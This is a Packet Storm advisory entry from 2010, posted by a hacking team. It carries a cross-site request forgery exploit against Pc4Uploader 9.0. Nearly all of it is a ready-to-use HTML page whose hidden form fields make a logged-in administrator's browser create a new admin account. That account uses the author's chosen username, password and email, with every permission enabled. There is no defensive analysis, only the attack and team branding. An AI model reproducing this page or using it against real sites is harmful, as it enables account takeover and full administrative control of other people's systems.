Pc4Uploader 9.0 Cross Site Request Forgery

2010-08-28T00:00:00
ID PACKETSTORM:93245
Type packetstorm
Reporter RENO
Modified 2010-08-28T00:00:00

Description

                                        
                                            `# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO  
# TeaM : SauDi ViRuS TeaM  
# SiTe: WwW.Sa-ViRuS.CoM  
# Software Link: http://www.pc4arb.com/product-10.html  
  
<html>  
<title>[SvT]</title>  
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">  
<p  
align="left"><font size="5"  
color="#FFFFFF"><b>   
  
  
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin  
Exploit<br>  
  
  
Author : RENO<br>  
  
TeaM : SauDi ViRuS TeaM<br>  
  
  
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>  
  
  
Email : R7e@HoTMaiL.coM</font></b></p>  
<p align="center"> </p>  
<p align="center"> </p>  
  
<svt>  
<center>  
  
<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">  
<input type="hidden" name="username" value="R3NO"/>  
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>  
<input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>  
<input type="hidden" name="setting_rols" value="1"/>  
<input type="hidden" name="member_rols" value="1"/>  
<input type="hidden" name="files_rols" value="1"/>  
<input type="hidden" name="msg_rols" value="1"/>  
<input type="hidden" name="news_rols" value="1"/>  
<input type="hidden" name="advs_rols" value="1"/>  
<input type="hidden" name="links_rols" value="1"/>  
<input type="hidden" name="support_rols" value="1"/>  
<input type=submit value="Submit">  
</p>  
  
</form>  
</svt>  
  
  
</center>  
</html>   
  
  
`